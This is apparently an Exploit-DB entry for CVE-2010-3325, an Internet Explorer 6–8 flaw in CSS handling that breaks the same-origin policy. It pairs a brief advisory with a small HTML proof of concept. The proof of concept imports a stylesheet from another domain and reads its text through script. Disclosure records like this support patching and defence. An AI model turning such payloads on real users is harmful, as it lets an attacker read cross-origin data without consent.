Microsoft Internet Explorer 7/8 - CSS Handling Cross Domain Information Disclosure

Author: Chris Evans
type: dos
platform: windows
port: 
date_added: 2010-09-06  
date_updated: 2014-09-09  
verified: 1  
codes: CVE-2010-3325;OSVDB-68547  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 34602.html  
source: https://www.securityfocus.com/bid/42993/info

Microsoft Internet Explorer is prone to a cross-domain information-disclosure vulnerability because the application fails to enforce the same-origin policy.

An attacker can exploit this issue by enticing an unsuspecting user into viewing a page containing malicious content.

Successful exploits will allow attackers to bypass the same-origin policy and obtain potentially sensitive information; other attacks are possible.

This issue affects Internet Explorer 6, 7, and 8.

<html> <head> <style> @import url("http://www.example.com/hi_heige"); </style> <script> function loaded() { alert(document.styleSheets(0).imports(0).cssText); } </script> </head> <body onload="loaded()"> </body> </html>